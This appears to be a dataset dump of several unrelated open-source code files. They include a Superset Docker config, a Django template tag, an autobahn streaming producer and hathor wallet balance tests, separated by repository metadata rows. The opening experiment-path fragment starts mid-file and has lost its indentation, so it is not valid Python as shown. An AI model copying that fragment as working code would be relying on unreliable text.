args.save_path = args.source_path + '/' + args.experiment_name
# 判断日期文件夹是否建立
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
# file_size = len(os.listdir(args.save_path))
# args.save_path = args.save_path + str(file_size + 1)
# os.makedirs(args.save_path)
else:
args.save_path = last_path
return args
# 在当次实验的记录文件下创建配置文件中checkpoint_folder的文件夹
def args_wrapper_checkpoint_folder(args, file_number):
# 创建一个txt文本 记录此次存放结果的路径
txt_path = args.save_path + "/\.result_path.txt"
file = open(txt_path, 'w')
file_list = os.listdir(args.save_path)
# 根据文件夹的时间降序排列
# file_list.sort(key=lambda fn: os.path.getmtime(args.save_path + "/" + fn), reverse=True)
args.save_path = args.save_path + "/" +str(file_number)
path = args.save_path + "/" + args.checkpoint_folder_name
os.makedirs(path)
file.write(args.save_path)
def add_ex_config_obs(ex, args, result_path):
if args.flag_is_train: # 如果是训练则创建观察者(存放结果的文件)
ex.observers.append(FileStorageObserver.create(args.save_path))
ex.add_config({"config": args})
else:
if result_path is None:
file = open(args.save_path + "\.result_path.txt", "w+")
path = file.read()
args.save_path = path
else:
args.save_path = args.save_path + "/" + str(result_path)
# args.save_path = args.source_path + '/' + args.experiment_name + '/'
# if not os.path.exists(args.save_path):
# os.makedirs(args.save_path)
# return args
# def cfg_from_file(filename,subfolder):
# if subfolder==None:
# with open(os.path.join(base_dir, "config","{}.yaml".format(filename)), 'r', encoding='utf-8') as f:
# yaml_cfg = edict(yaml.load(f, Loader=yaml.FullLoader))
# else:
# with open(os.path.join(base_dir,"config",subfolder,"{}.yaml".format(filename)),'r',encoding='utf-8') as f:
# yaml_cfg = edict(yaml.load(f,Loader=yaml.FullLoader))
#
# return yaml_cfg
#合并操作,以‘/’为分隔符进行分割文件夹和文件名
# def merge(param):
# for key in param:
# if key.find('/')==-1:
# dict[key]=cfg_from_file(key,None)
# else:
# print(key.split('/')[0])
# print(key.split('/')[1])
# dict[key.split('/')[1]]=cfg_from_file(key.split('/')[1],key.split('/')[0])
# return dict
| 30.372093 | 116 | 0.627361 |
ace74f2d7f3fe46af234da4da3d50af3676e50f6 | 861 | py | Python | betfairlightweight/compat.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | 1 | 2020-04-15T22:17:26.000Z | 2020-04-15T22:17:26.000Z | betfairlightweight/compat.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | null | null | null | betfairlightweight/compat.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | 1 | 2021-04-26T14:47:28.000Z | 2021-04-26T14:47:28.000Z | import sys
import datetime
_ver = sys.version_info
#: Python 2.x?
is_py2 = (_ver[0] == 2)
#: Python 3.x?
is_py3 = (_ver[0] == 3)
try:
from builtins import FileNotFoundError
except ImportError:
class FileNotFoundError(OSError):
pass
if is_py2:
basestring = basestring
numeric_types = (int, long, float)
integer_types = (int, long)
elif is_py3:
basestring = (str, bytes)
numeric_types = (int, float)
integer_types = (int,)
# will attempt to use c libraries if installed
try:
import ujson as json
except ImportError:
import json
try:
import ciso8601
def parse_datetime(datetime_string):
return ciso8601.parse_datetime_unaware(datetime_string)
except ImportError:
def parse_datetime(datetime_string):
return datetime.datetime.strptime(datetime_string, "%Y-%m-%dT%H:%M:%S.%fZ")
| 19.133333 | 83 | 0.691057 |
ace7503c7edd9fa8cca99bc872df08edabb0faa5 | 2,292 | py | Python | contrib/docker/superset_config.py | franksam007/incubator-superset | a0f572eb3ea4b89cb435a8af20436f8e1d34814e | [
"Apache-2.0"
] | 108 | 2018-01-22T11:09:59.000Z | 2021-01-15T10:53:04.000Z | contrib/docker/superset_config.py | Odirlei-Stein/incubator-superset | 52afc33b31475536b287b56d262b9eaa32f479ab | [
"Apache-2.0"
] | 112 | 2018-01-25T22:57:21.000Z | 2019-08-22T20:08:48.000Z | contrib/docker/superset_config.py | Odirlei-Stein/incubator-superset | 52afc33b31475536b287b56d262b9eaa32f479ab | [
"Apache-2.0"
] | 24 | 2018-01-19T22:54:39.000Z | 2020-11-12T13:04:25.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
def get_env_variable(var_name, default=None):
"""Get the environment variable or raise exception."""
try:
return os.environ[var_name]
except KeyError:
if default is not None:
return default
else:
error_msg = 'The environment variable {} was missing, abort...'\
.format(var_name)
raise EnvironmentError(error_msg)
POSTGRES_USER = get_env_variable('POSTGRES_USER')
POSTGRES_PASSWORD = get_env_variable('POSTGRES_PASSWORD')
POSTGRES_HOST = get_env_variable('POSTGRES_HOST')
POSTGRES_PORT = get_env_variable('POSTGRES_PORT')
POSTGRES_DB = get_env_variable('POSTGRES_DB')
# The SQLAlchemy connection string.
SQLALCHEMY_DATABASE_URI = 'postgresql://%s:%s@%s:%s/%s' % (POSTGRES_USER,
POSTGRES_PASSWORD,
POSTGRES_HOST,
POSTGRES_PORT,
POSTGRES_DB)
REDIS_HOST = get_env_variable('REDIS_HOST')
REDIS_PORT = get_env_variable('REDIS_PORT')
class CeleryConfig(object):
BROKER_URL = 'redis://%s:%s/0' % (REDIS_HOST, REDIS_PORT)
CELERY_IMPORTS = ('superset.sql_lab', )
CELERY_RESULT_BACKEND = 'redis://%s:%s/1' % (REDIS_HOST, REDIS_PORT)
CELERY_ANNOTATIONS = {'tasks.add': {'rate_limit': '10/s'}}
CELERY_TASK_PROTOCOL = 1
CELERY_CONFIG = CeleryConfig
| 38.847458 | 77 | 0.655759 |
ace751b41871714c9503ba6f26adce284b7a86b1 | 1,476 | py | Python | setup.py | doncazzo/super_fernet | 9d00dbbbe5dcef43a7b8e883a333f0e430f0f21c | [
"MIT"
] | null | null | null | setup.py | doncazzo/super_fernet | 9d00dbbbe5dcef43a7b8e883a333f0e430f0f21c | [
"MIT"
] | null | null | null | setup.py | doncazzo/super_fernet | 9d00dbbbe5dcef43a7b8e883a333f0e430f0f21c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = ['Click>=7.0', ]
test_requirements = ['pytest>=3', ]
setup(
author="armando contreras",
author_email='doncazzo@outlook.it',
python_requires='>=3.6',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
description="python library that containst all the posible ways to use fernet cryptograhpy symmetric encryption",
entry_points={
'console_scripts': [
'super_fernet=super_fernet.cli:main',
],
},
install_requires=requirements,
license="MIT license",
long_description=readme + '\n\n' + history,
include_package_data=True,
keywords='super_fernet',
name='super_fernet',
packages=find_packages(include=['super_fernet', 'super_fernet.*']),
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/doncazzo/super_fernet',
version='0.1.0',
zip_safe=False,
)
| 29.52 | 117 | 0.647696 |
ace7521a614471ae4e9e5554314e63e9e1289b86 | 1,397 | py | Python | mtcompono/templatetags/mtcompono_tags.py | benoitc/mt-compono | 05a334fbd0084f9650fa6c86b9252c4754f6405a | [
"Apache-2.0"
] | 1 | 2020-01-21T11:12:18.000Z | 2020-01-21T11:12:18.000Z | mtcompono/templatetags/mtcompono_tags.py | benoitc/mt-compono | 05a334fbd0084f9650fa6c86b9252c4754f6405a | [
"Apache-2.0"
] | null | null | null | mtcompono/templatetags/mtcompono_tags.py | benoitc/mt-compono | 05a334fbd0084f9650fa6c86b9252c4754f6405a | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of compono released under the Apache 2 license.
# See the NOTICE for more information.
from django.conf import Settings
from django.template import Library, Node, Template, TemplateSyntaxError
from mtcompono.models import Page, Type
register = Library()
class ListTypeNode(Node):
def __init__(self, type_name):
self.type_name = type_name
def render(self, context):
t = Type.by_name(self.type_name)
if not t:
if settings.DEBUG:
return _("[%s n'existe pas]" % self.type_name)
else:
return ''
items = Page.by_type(t._id)
output = ''
try:
tpl = Template(t.templates['list'])
context.update({"items": items})
output = tpl.render(context)
except TemplateSyntaxError, e:
if settings.DEBUG:
return _("[Erreurs de syntaxe: %s]" % e)
else:
return ''
return output
def list_type(parser, token):
bits = token.contents.split()
if len(bits) < 2:
raise TemplateSyntaxError(_("'list_type' tag nécessite au moins un"
" argument: le nom du type"))
return ListTypeNode(bits[1])
list_type = register.tag(list_type)
| 29.723404 | 99 | 0.553329 |
ace7537a26cd91ed5e297a990e77c412c3355bf0 | 7,105 | py | Python | src/data/income_weather_data_generator.py | Dzirik/ds_ml_template | b9c63ea5836c478ec7a88a1bf5a8129c29d92b3a | [
"MIT"
] | null | null | null | src/data/income_weather_data_generator.py | Dzirik/ds_ml_template | b9c63ea5836c478ec7a88a1bf5a8129c29d92b3a | [
"MIT"
] | null | null | null | src/data/income_weather_data_generator.py | Dzirik/ds_ml_template | b9c63ea5836c478ec7a88a1bf5a8129c29d92b3a | [
"MIT"
] | null | null | null | """
Data Generator
File for generating regression _data simulating income based on the date and weather.
The documentation can be found in notebook/documentation/income_weather_data_generator_documentation.py.
"""
from datetime import datetime, timedelta
from typing import List, Union, Tuple, Any
from numpy import random, array, ndarray, dtype
from numpy import sum as summation
from pandas import DataFrame, get_dummies
from src.transformations.time_series_windows import TimeSeriesWindowsNumpy
ATTR_DATE = "DATE"
ATTR_DAY_OF_WEEK_NUM = "DAY_OF_WEEK_NUM"
ATTR_WEEK_NUM = "WEEK_NUM"
ATTR_WEATHER = "WEATHER"
ATTR_TEMPERATURE = "TEMPERATURE"
ATTR_RANDOM = "RANDOM"
ATTR_OUTPUT = "OUTPUT"
WEATHER_TYPES = ["sun", "rain", "wind", "cloud"]
# pylint: disable=invalid-name
# pylint: disable=too-many-instance-attributes
class IncomeWeatherDataGenerator:
"""
Class for generating the _data.
"""
def __init__(self) -> None:
self._time_series_window_transformer = TimeSeriesWindowsNumpy()
self._n: int
self._data = DataFrame()
self._data_transformed = DataFrame()
self._X_multi: ndarray[Any, dtype[Any]]
self._Y_multi: ndarray[Any, dtype[Any]]
self._seed = 39206
self._weights_multi: ndarray[Any, dtype[Any]]
def set_seed(self, seed_number: int) -> None:
"""
Sets _seed number.
:param seed_number: int. New _seed
"""
self._seed = seed_number
def _create_dates(self, start_date: str) -> None:
"""
Creates three columns with the date, day of the week number and week number of each observations.
:param start_date: str. Starting date of the observations.
"""
start_date_datetime = datetime.strptime(start_date, "%Y-%m-%d")
end_date_datetime = start_date_datetime + timedelta(days=self._n - 1)
delta = timedelta(days=1)
d = start_date_datetime
dates = []
while d <= end_date_datetime:
dates.append(d)
d += delta
self._data[ATTR_DATE] = dates
self._data[ATTR_DAY_OF_WEEK_NUM] = [int(d.strftime("%w")) for d in dates]
self._data[ATTR_WEEK_NUM] = [int(d.strftime("%V")) for d in dates]
def _create_categorical(self) -> None:
"""
Creates a column with a random values chosen from the list of strings WEATHER_TYPES.
"""
self._data[ATTR_WEATHER] = random.choice(WEATHER_TYPES, self._n, replace=True)
def _create_temperature(self) -> None:
"""
Creates a column with a random value.
"""
self._data[ATTR_TEMPERATURE] = random.uniform(10, 35, self._n)
def _create_random(self) -> None:
"""
Creates a column with a random value.
"""
self._data[ATTR_RANDOM] = random.randn(self._n) * 10
def save_as_csv(self) -> None:
"""
Saves the _data as a CSV file.
"""
self._data.to_csv("_data.csv", index=False)
def get_weights_multi(self) -> ndarray[Any, dtype[Any]]:
"""
Returns the weights used in multi dimensional example.
:return: ndarray[Any, dtype[Any]].
"""
return self._weights_multi
def get_attributes_names_multi(self) -> List[str]:
"""
Returns the names of attributes in multi dimensional example.
:return: List[str]. List of attribute name.
"""
return list(self._data_transformed.columns)[0:13]
def _create_multi_dim(self, input_window_len: int = 20) -> None:
"""
Creates multidimensional regression.
:param input_window_length: int.
"""
df = self._data_transformed.copy()
df.drop(columns=["OUTPUT"], inplace=True)
# I need only X, Y is calculated as another list.
self._X_multi, _ = self._time_series_window_transformer.fit_predict(
data=df.to_numpy(), input_window_len=input_window_len, output_window_len=0, shift=1
)
self._weights_multi = random.randint(low=-20, high=100, size=self._X_multi[0, :, :].shape)
# self._Y_multi = [nan] * (self._X_multi[0].shape[0] - 1)
list_pom = []
for i in range(self._X_multi.shape[0]):
Z = self._X_multi[i, :, :] * self._weights_multi
list_pom.append(Z.sum())
n = len(list_pom)
self._Y_multi = array(list_pom)
self._Y_multi = self._Y_multi.reshape((n, 1))
def generate(self, start_date: str, betas: List[Union[int, float]], n: int = 100, sigma: int = 10,
input_window_len: int = 20) -> Tuple[DataFrame, DataFrame, ndarray[Any, dtype[Any]], \
ndarray[Any, dtype[Any]]]:
"""
Creates the _data set which includes an output column comprised by the output of a linear regression.
:param start_date: str. Starting date of the observations.
:param betas: List[Union[int, float]]. List of coefficients for attributes for transformed _data frame of length
12.
['TEMPERATURE', 'DAY_OF_WEEK_NUM_0', 'DAY_OF_WEEK_NUM_1',
'DAY_OF_WEEK_NUM_2', 'DAY_OF_WEEK_NUM_3', 'DAY_OF_WEEK_NUM_4',
'DAY_OF_WEEK_NUM_5', 'DAY_OF_WEEK_NUM_6', 'WEATHER_cloud',
'WEATHER_rain', 'WEATHER_sun', 'WEATHER_wind']
Example: [30.1, 2, 1, 4, 3, 6, -1, -3, 0, -10, 25, 10]
:param n: int. Number of days to be generated.
:param sigma: Union[int, float]. Intercept coefficient.
:param input_window_len: int. Lenght of the historical data backwards for creating multidimensional
regression.
:return: Tuple[DataFrame, DataFrame, List[ndarray[Any, dtype[Any]]], List[ndarray[Any, dtype[Any]]]].
Non-tranformed _data frame, transformed _data frame, array of multi dimensional regression X and Y.
"""
self._n = n
# generate columns
random.seed(self._seed)
self._create_dates(start_date)
self._create_categorical()
self._create_temperature()
self._create_random()
# transform and compute regression output
self._data_transformed = get_dummies(data=self._data[["TEMPERATURE", "DAY_OF_WEEK_NUM", "WEATHER"]], # _data
columns=["DAY_OF_WEEK_NUM", "WEATHER"]) # to be encoded/transformed
self._data[ATTR_OUTPUT] = summation(self._data_transformed.values * betas, axis=1) + random.randn(n) * sigma
# delete unused columns in non-transformed _data frame
del self._data[ATTR_DAY_OF_WEEK_NUM]
del self._data[ATTR_WEEK_NUM]
# add missing columns to transformed
self._data_transformed[ATTR_RANDOM] = self._data[ATTR_RANDOM]
self._data_transformed[ATTR_OUTPUT] = self._data[ATTR_OUTPUT]
# create multi data
self._create_multi_dim(input_window_len)
return self._data, self._data_transformed, self._X_multi, self._Y_multi
# pylint: enable=invalid-name
# pylint: enable=too-many-instance-attributes
| 40.6 | 120 | 0.640535 |
ace75460f57898868d556ec2c3cc208bf642c179 | 3,146 | py | Python | examples/websocket/streaming/streaming_producer_client.py | rapyuta-robotics/autobahn_rce | 3916768cbf694417f1cf3927ebd343b460a09d73 | [
"Apache-2.0"
] | null | null | null | examples/websocket/streaming/streaming_producer_client.py | rapyuta-robotics/autobahn_rce | 3916768cbf694417f1cf3927ebd343b460a09d73 | [
"Apache-2.0"
] | null | null | null | examples/websocket/streaming/streaming_producer_client.py | rapyuta-robotics/autobahn_rce | 3916768cbf694417f1cf3927ebd343b460a09d73 | [
"Apache-2.0"
] | 1 | 2016-05-05T18:27:33.000Z | 2016-05-05T18:27:33.000Z | ###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from ranstring import randomByteString
from zope.interface import implements
from twisted.internet import reactor, interfaces
from autobahn.websocket import WebSocketProtocol, \
WebSocketClientFactory, \
WebSocketClientProtocol, \
connectWS
# 2^63 - This is the maximum imposed by the WS protocol
FRAME_SIZE = 0x7FFFFFFFFFFFFFFF
class RandomByteStreamProducer:
"""
A Twisted Push Producer generating a stream of random octets sending out data
in a WebSockets message frame.
"""
implements(interfaces.IPushProducer)
def __init__(self, proto):
self.proto = proto
self.started = False
self.paused = False
def pauseProducing(self):
self.paused = True
def resumeProducing(self):
self.paused = False
if not self.started:
self.proto.beginMessage(opcode = WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.proto.beginMessageFrame(FRAME_SIZE)
self.started = True
while not self.paused:
data = randomByteString(1024)
if self.proto.sendMessageFrameData(data) <= 0:
self.proto.beginMessageFrame(FRAME_SIZE)
print "new frame started!"
def stopProducing(self):
pass
class StreamingProducerHashClientProtocol(WebSocketClientProtocol):
"""
Streaming WebSockets client that generates stream of random octets
sent to streaming WebSockets server, which computes a running SHA-256,
which it will send every BATCH_SIZE octets back to us. This example
uses a Twisted producer to produce the byte stream as fast as the
receiver can consume, but not faster. Therefor, we don't need the
application-level flow control as with the other examples.
"""
def onOpen(self):
self.count = 0
producer = RandomByteStreamProducer(self)
self.registerProducer(producer, True)
producer.resumeProducing()
def onMessage(self, message, binary):
print "Digest for batch %d computed by server: %s" % (self.count, message)
self.count += 1
if __name__ == '__main__':
factory = WebSocketClientFactory("ws://localhost:9000")
factory.protocol = StreamingProducerHashClientProtocol
connectWS(factory)
reactor.run()
| 34.571429 | 81 | 0.643675 |
ace754eb174a3e64836422fee58440a8bdbc7c19 | 18,399 | py | Python | tests/wallet/test_balance_update.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | null | null | null | tests/wallet/test_balance_update.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | 12 | 2020-10-04T17:14:52.000Z | 2022-03-03T22:21:56.000Z | tests/wallet/test_balance_update.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | null | null | null | from hathor.conf import HathorSettings
from hathor.crypto.util import decode_address
from hathor.transaction import Transaction, TxInput, TxOutput
from hathor.transaction.scripts import P2PKH
from hathor.wallet.base_wallet import SpentTx, UnspentTx, WalletBalance, WalletInputInfo, WalletOutputInfo
from hathor.wallet.exceptions import PrivateKeyNotFound
from tests import unittest
from tests.utils import add_blocks_unlock_reward, add_new_blocks, create_tokens
settings = HathorSettings()
class HathorSyncMethodsTestCase(unittest.TestCase):
def setUp(self):
super().setUp()
self.network = 'testnet'
self.manager = self.create_peer(self.network, unlock_wallet=True)
blocks = add_new_blocks(self.manager, 3, advance_clock=15)
self.blocks_tokens = [sum(txout.value for txout in blk.outputs) for blk in blocks]
address = self.get_address(0)
value = 100
self.initial_balance = sum(self.blocks_tokens[:3]) - 100
outputs = [
WalletOutputInfo(address=decode_address(address), value=int(value), timelock=None)
]
add_blocks_unlock_reward(self.manager)
self.tx1 = self.manager.wallet.prepare_transaction_compute_inputs(Transaction, outputs,
self.manager.tx_storage)
self.tx1.weight = 10
self.tx1.parents = self.manager.get_new_tx_parents()
self.tx1.timestamp = int(self.clock.seconds())
self.tx1.resolve()
self.manager.propagate_tx(self.tx1)
self.run_to_completion()
def test_balance_update1(self):
# Tx2 is twin with tx1 but less acc weight, so it will get voided
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
# Change of parents only, so it's a twin.
# With less weight, so the balance will continue because tx1 will be the winner
tx2 = Transaction.create_from_struct(self.tx1.get_struct())
tx2.parents = [self.tx1.parents[1], self.tx1.parents[0]]
tx2.weight = 9
tx2.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx2)
self.run_to_completion()
meta1 = self.tx1.get_metadata(force_reload=True)
self.assertEqual(meta1.twins, [tx2.hash])
meta2 = tx2.get_metadata(force_reload=True)
self.assertEqual(meta2.voided_by, {tx2.hash})
# Balance is the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
# Voided wallet history
index_voided = 0
output_voided = tx2.outputs[index_voided]
address = output_voided.to_human_readable()['address']
voided_unspent = UnspentTx(tx2.hash, index_voided, output_voided.value, tx2.timestamp,
address, output_voided.token_data, voided=True)
self.assertEqual(len(self.manager.wallet.voided_unspent), 1)
voided_utxo = self.manager.wallet.voided_unspent.get((voided_unspent.tx_id, index_voided))
self.assertIsNotNone(voided_utxo)
self.assertEqual(voided_utxo.to_dict(), voided_unspent.to_dict())
input_voided = tx2.inputs[0]
key = (input_voided.tx_id, input_voided.index)
voided_spent = SpentTx(tx2.hash, input_voided.tx_id, input_voided.index, self.blocks_tokens[0],
tx2.timestamp, voided=True)
self.assertEqual(len(self.manager.wallet.voided_spent), 1)
self.assertEqual(len(self.manager.wallet.voided_spent[key]), 1)
self.assertEqual(self.manager.wallet.voided_spent[key][0].to_dict(), voided_spent.to_dict())
def test_balance_update2(self):
# Tx2 is twin with tx1 with equal acc weight, so both will get voided
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
# Change of parents only, so it's a twin.
# Same weight, so both will be voided then the balance increases
tx2 = Transaction.create_from_struct(self.tx1.get_struct())
tx2.parents = [self.tx1.parents[1], self.tx1.parents[0]]
tx2.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx2)
self.run_to_completion()
meta1 = self.tx1.get_metadata(force_reload=True)
self.assertEqual(meta1.twins, [tx2.hash])
self.assertEqual(meta1.voided_by, {self.tx1.hash})
meta2 = tx2.get_metadata()
self.assertEqual(meta2.voided_by, {tx2.hash})
# Balance changed
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, sum(self.blocks_tokens[:3])))
def test_balance_update3(self):
# Tx2 is twin with tx1 with higher acc weight, so tx1 will get voided
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
# Change of parents only, so it's a twin.
# With higher weight, so the balance will continue because tx2 will be the winner
tx2 = Transaction.create_from_struct(self.tx1.get_struct())
tx2.parents = [self.tx1.parents[1], self.tx1.parents[0]]
tx2.weight = 13
tx2.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx2)
self.run_to_completion()
meta1 = self.tx1.get_metadata(force_reload=True)
self.assertEqual(meta1.twins, [tx2.hash])
self.assertEqual(meta1.voided_by, {self.tx1.hash})
meta2 = tx2.get_metadata()
self.assertEqual(meta2.voided_by, None)
# Balance is the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
def test_balance_update4(self):
    """tx2 spends tx1's output; tx3 is a twin of tx2 with equal acc weight,
    so both are voided and the balance is unchanged. Also checks that
    re-spending the same inputs requires force=True."""
    self.manager.reactor.advance(1)

    # Start balance
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance))

    address = self.manager.wallet.get_unused_address_bytes()
    value = self.blocks_tokens[0] - 100
    inputs = [WalletInputInfo(tx_id=self.tx1.hash, index=0, private_key=None)]
    outputs = [WalletOutputInfo(address=address, value=int(value), timelock=None)]

    tx2 = self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs, outputs,
                                                                    self.manager.tx_storage)
    tx2.weight = 10
    tx2.parents = [self.tx1.hash, self.tx1.parents[0]]
    tx2.timestamp = int(self.clock.seconds())
    tx2.resolve()
    self.manager.propagate_tx(tx2)
    self.run_to_completion()

    # Test create same tx with allow double spending
    with self.assertRaises(PrivateKeyNotFound):
        self.manager.wallet.prepare_transaction_incomplete_inputs(
            Transaction,
            inputs=inputs,
            outputs=outputs,
            tx_storage=self.manager.tx_storage
        )

    self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs=inputs, outputs=outputs,
                                                              force=True, tx_storage=self.manager.tx_storage)

    # Change of parents only, so it's a twin.
    tx3 = Transaction.create_from_struct(tx2.get_struct())
    tx3.parents = [tx2.parents[1], tx2.parents[0]]
    tx3.resolve()

    # Propagate a conflicting twin transaction
    self.manager.propagate_tx(tx3)
    self.run_to_completion()

    meta2 = tx2.get_metadata(force_reload=True)
    self.assertEqual(meta2.twins, [tx3.hash])
    self.assertEqual(meta2.voided_by, {tx2.hash})

    meta3 = tx3.get_metadata()
    self.assertEqual(meta3.voided_by, {tx3.hash})

    # Balance is the same
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance))
def test_balance_update5(self):
    """tx2 spends tx1's output; tx3 is a twin of tx1 with LESS acc weight,
    so tx1/tx2 win and tx3 is voided; balance unchanged."""
    self.clock.advance(1)

    # Start balance
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance))

    address = self.manager.wallet.get_unused_address_bytes()
    value = self.blocks_tokens[0] - 100
    inputs = [WalletInputInfo(tx_id=self.tx1.hash, index=0, private_key=None)]
    outputs = [WalletOutputInfo(address=address, value=int(value), timelock=None)]

    tx2 = self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs, outputs,
                                                                    self.manager.tx_storage)
    tx2.weight = 10
    tx2.parents = [self.tx1.hash, self.tx1.parents[0]]
    tx2.timestamp = int(self.clock.seconds())
    tx2.resolve()

    # Change of parents only, so it's a twin.
    tx3 = Transaction.create_from_struct(self.tx1.get_struct())
    tx3.parents = [self.tx1.parents[1], self.tx1.parents[0]]
    tx3.resolve()

    # Propagate a conflicting twin transaction
    self.manager.propagate_tx(tx2)
    self.manager.propagate_tx(tx3)
    self.run_to_completion()

    meta2 = tx2.get_metadata()
    self.assertEqual(meta2.twins, [])
    self.assertEqual(meta2.voided_by, None)

    meta3 = tx3.get_metadata()
    self.assertEqual(meta3.voided_by, {tx3.hash})
    self.assertEqual(meta3.twins, [self.tx1.hash])

    # Balance is the same
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance))
def test_balance_update6(self):
    """tx2 is a twin of tx1; tx3 confirms tx1 (as a parent), raising tx1's
    acc weight so tx1 wins. Balance then reflects the 100 spent by tx3."""
    self.manager.reactor.advance(1)

    # Start balance
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance))

    # Change of parents only, so it's a twin.
    tx2 = Transaction.create_from_struct(self.tx1.get_struct())
    tx2.parents = [self.tx1.parents[1], self.tx1.parents[0]]
    tx2.resolve()

    address = self.get_address(0)
    value = 100
    outputs = [
        WalletOutputInfo(address=decode_address(address), value=int(value), timelock=None)
    ]

    tx3 = self.manager.wallet.prepare_transaction_compute_inputs(Transaction, outputs, self.manager.tx_storage)
    tx3.weight = 10
    tx3.parents = [self.tx1.hash, self.tx1.parents[0]]
    tx3.timestamp = int(self.clock.seconds())
    tx3.resolve()

    # Propagate a conflicting twin transaction
    self.manager.propagate_tx(tx2)
    self.manager.propagate_tx(tx3)
    self.run_to_completion()

    # Balance is the same, minus the 100 sent in tx3
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance - 100))
def test_balance_update7(self):
    """tx2 spends tx1's output; tx3 is a twin of tx1 with HIGHER acc weight,
    so tx1 and tx2 are voided and tx3 wins; balance unchanged."""
    self.manager.reactor.advance(1)

    # Start balance
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance))

    address = self.manager.wallet.get_unused_address_bytes()
    value = self.blocks_tokens[0] - 100
    inputs = [WalletInputInfo(tx_id=self.tx1.hash, index=0, private_key=None)]
    outputs = [WalletOutputInfo(address=address, value=int(value), timelock=None)]

    tx2 = self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs, outputs,
                                                                    self.manager.tx_storage)
    tx2.weight = 10
    tx2.parents = [self.tx1.hash, self.tx1.parents[0]]
    tx2.timestamp = int(self.clock.seconds())
    tx2.resolve()

    # Change of parents only, so it's a twin.
    tx3 = Transaction.create_from_struct(self.tx1.get_struct())
    tx3.parents = [self.tx1.parents[1], self.tx1.parents[0]]
    tx3.weight = 14
    tx3.resolve()

    # Propagate a conflicting twin transaction
    self.manager.propagate_tx(tx2)
    self.manager.propagate_tx(tx3)
    self.run_to_completion()

    meta2 = tx2.get_metadata(force_reload=True)
    self.assertEqual(meta2.twins, [])
    # tx2 is voided transitively, because its (voided) input tx1 is
    self.assertEqual(meta2.voided_by, {self.tx1.hash})

    meta3 = tx3.get_metadata(force_reload=True)
    self.assertEqual(meta3.voided_by, None)
    self.assertEqual(meta3.twins, [self.tx1.hash])

    # Balance is the same
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance))
def test_balance_update_twin_tx(self):
    """Build a chain tx2 -> tx3 -> tx4, then propagate tx5 as a twin of
    tx4 (same weight): both tx4 and tx5 get voided, leaving the initial
    balance intact."""
    # Start balance
